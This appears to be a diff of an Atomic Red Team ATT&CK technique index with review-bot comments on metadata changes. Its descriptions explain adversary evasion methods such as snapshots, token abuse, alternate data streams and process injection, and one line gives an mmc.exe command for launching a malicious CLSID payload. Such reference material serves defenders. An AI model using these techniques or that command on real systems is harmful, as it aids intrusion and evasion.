- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
- type: attack-pattern
- created: '2020-06-09T15:33:13.563Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.001
- url: https://attack.mitre.org/techniques/T1578/001
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS Cloud Trail Backup API
- url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
- Retrieved April 27, 2020.
- - source_name: Azure - Monitor Logs
- url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
- description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
- Retrieved May 1, 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- - source_name: GCP - Creating and Starting a VM
- url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- description: Google. (2020, April 23). Creating and Starting a VM instance.
- Retrieved May 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:53:44.870Z'
name: Create Snapshot
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -30465,6 +30716,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
@@ -30473,20 +30727,51 @@ defense-evasion:
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create
command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot":
parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME]
.(Citation: GCP - Creating and Starting a VM)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Snapshot: Snapshot Creation'
- 'Snapshot: Snapshot Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ created: '2020-06-09T15:33:13.563Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/001
+ external_id: T1578.001
+ - source_name: AWS Cloud Trail Backup API
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ - source_name: GCP - Creating and Starting a VM
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure - Monitor Logs
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
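Review bot: `x_mitre_permissions_required` (`- User`) is dropped from T1578.001 with no replacement field while `x_mitre_attack_spec_version` jumps from 2.1.0 to 3.2.0 in the same hunk; confirm the field removal is intended under the newer spec rather than lost during regeneration. The hunk also turns the object into a full STIX record in one go (`type`, `id`, `created`, `created_by_ref`, `revoked`, `external_references`, `object_marking_refs` all added here), so please check the generator does not already emit any of these keys earlier in the same object: a duplicate mapping key is either a YAML error or a silent override depending on the loader.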
@@ -30543,6 +30828,7 @@ defense-evasion:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -30553,13 +30839,12 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
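Review bot: the platform list replaces `Office 365`, `Google Workspace` and `Azure AD` with `Office Suite` and `Identity Provider`, and the same substitution is applied to T1078.004 and T1556 later in the patch. Anything downstream that filters on or builds per-platform indexes from the old names will silently return nothing for these techniques after this change, so derived files should be regenerated in the same commit and the old platform strings grepped for across the repository.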
@@ -30618,11 +30903,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
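Review bot: `spec_version: '2.1'` is removed from T1550.001 here, and the same deletion is repeated for every technique object in the patch (T1078.004, T1480.001, T1564.004, T1055.001 and onward). `spec_version` is a required common property on STIX 2.1 domain objects, so if any tooling re-emits these technique blocks as STIX it now has to add the property back; a one-line rationale in the commit message would save the next reader from wondering whether the drop was deliberate.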
@@ -30662,8 +30946,10 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
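Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted after `kill_chain_phases` while the identical key (together with `x_mitre_modified_by_ref`) is removed from the end of the same object a few hunks later; this is a pure key reordering with no value change, and it inflates the diff so that the real edits (the new CISA contributor, the platform rename) are harder to spot. If the generator can sort keys deterministically, this noise disappears from future syncs.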
@@ -30671,13 +30957,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -30708,9 +30994,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests:
- name: Creating GCP Service Account and Service Account Key
@@ -30967,7 +31250,7 @@ defense-evasion:
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-04T14:52:51.290Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Environmental Keying
x_mitre_detection: Detecting the use of environmental keying may be difficult
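Review bot: `modified` for Environmental Keying moves backwards, from 2022-05-24T14:00:00.188Z to 2022-05-04T14:52:51.290Z, and the same regression recurs further down for Signed Script Proxy Execution, Network Device Authentication, Dylib Hijacking, Downgrade System Image, Trusted Developer Utilities Proxy Execution, MMC, Process Argument Spoofing, COR_PROFILER, Extra Window Memory Injection, LC_LOAD_DYLIB Addition, Bypass User Account Control and Sudo and Sudo Caching. All of the old values end in .188Z and most are exactly 14:00:00.188Z, which looks like a synthesized placeholder, so the new values are probably the genuine upstream timestamps; still worth a sentence in the commit message, because any consumer that syncs on `modified` being newer than its last-seen value will treat these objects as unchanged.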
@@ -30989,11 +31272,10 @@ defense-evasion:
- Static File Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.004:
technique:
- modified: '2024-02-14T21:56:34.831Z'
+ modified: '2024-09-12T15:27:29.615Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -31060,8 +31342,8 @@ defense-evasion:
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
- description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa364404
+ description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -31079,7 +31361,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.004
atomic_tests:
- name: Alternate Data Streams (ADS)
@@ -31324,7 +31605,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests:
- name: Process Injection via mavinject.exe
@@ -31375,7 +31655,7 @@ defense-evasion:
name: powershell
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -31388,6 +31668,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -31424,17 +31705,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -31480,9 +31761,6 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1216:
technique:
@@ -31520,7 +31798,7 @@ defense-evasion:
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:43:46.045Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Signed Script Proxy Execution
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -31539,7 +31817,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216
atomic_tests:
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
@@ -31608,7 +31885,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -31632,12 +31909,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
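Review bot: `x_mitre_attack_spec_version: 2.1.0` is deleted from Network Device Authentication with no re-insertion visible in this hunk, unlike T1078.004 and T1574.011 where the removal is paired with the key reappearing elsewhere in the object. The same bare deletion appears for Downgrade System Image, Process Argument Spoofing, COR_PROFILER, Extra Window Memory Injection and Sudo and Sudo Caching. If these objects end up with no attack spec version at all, that is data loss to check against the upstream export before merging; if the key was merely moved, the hunk that adds it back should be part of this patch.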
@@ -31721,7 +31996,6 @@ defense-evasion:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1601.002:
technique:
@@ -31743,7 +32017,7 @@ defense-evasion:
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:49:02.660Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
@@ -31777,12 +32051,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -31834,9 +32106,8 @@ defense-evasion:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests:
- name: Create local account with admin privileges
@@ -32155,7 +32426,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1127:
technique:
@@ -32202,7 +32472,7 @@ defense-evasion:
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
control solutions.'
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:37.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Trusted Developer Utilities Proxy Execution
x_mitre_detection: |-
@@ -32215,12 +32485,13 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_data_sources:
- 'Command: Command Execution'
+ - 'Module: Module Load'
+ - 'Process: Process Metadata'
- 'Process: Process Creation'
x_mitre_defense_bypassed:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127
atomic_tests:
- name: Lolbin Jsc.exe compile javascript to exe
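Review bot: two data sources (`Module: Module Load`, `Process: Process Metadata`) are added to T1127 while `x_mitre_attack_spec_version` stays at 2.1.0 and the preceding hunk moves the object's `modified` date back to 2022-05-05; the content grows but the provenance metadata now says the object is older than before. Please confirm this matches a single upstream export rather than a merge of two different snapshots.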
@@ -32381,7 +32652,7 @@ defense-evasion:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc
.(Citation:
abusing_com_reg)"
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:41:16.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: MMC
x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -32403,7 +32674,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.010:
technique:
@@ -32446,7 +32716,7 @@ defense-evasion:
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-11-29T15:56:50.370Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -32470,8 +32740,6 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.012:
technique:
@@ -32519,7 +32787,7 @@ defense-evasion:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -32557,8 +32825,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests:
- name: User scope COR_PROFILER
@@ -32737,7 +33003,7 @@ privilege-escalation:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -32789,8 +33055,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests:
- name: Process Injection via Extra Window Memory (EWM) x64 executable
@@ -32829,23 +33093,24 @@ privilege-escalation:
elevation_required: false
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
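Review bot: the line `can not access tasks created with schtasks` sits inside the removed block without a `-` marker, so either the marker was lost in extraction or that fragment survives into the new description, where it would be a dangling sentence, since the new text no longer mentions the deprecated `at` utility or the T1053.002 cross-reference at all. Please check the rendered YAML for that object. Separately, the new sentence about `Invoke-CimMethod` and `PS_ScheduledTask` is cited to `Red Canary - Atomic Red Team`, i.e. this repository citing upstream citing this repository; acceptable if that is what ATT&CK publishes, but not something to correct locally.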
@@ -32892,7 +33157,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -32924,8 +33189,8 @@ privilege-escalation:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -32939,6 +33204,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
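Review bot: the new `Red Canary - Atomic Red Team` reference points at the master branch of T1053.005.md, so the cited content can change underneath the citation and the retrieved date loses its meaning. The Empire reference elsewhere in this file pins a commit hash in the URL; the same form would be preferable here.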
@@ -32951,11 +33220,14 @@ privilege-escalation:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests:
- name: Scheduled Task Startup Script
@@ -33395,7 +33667,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
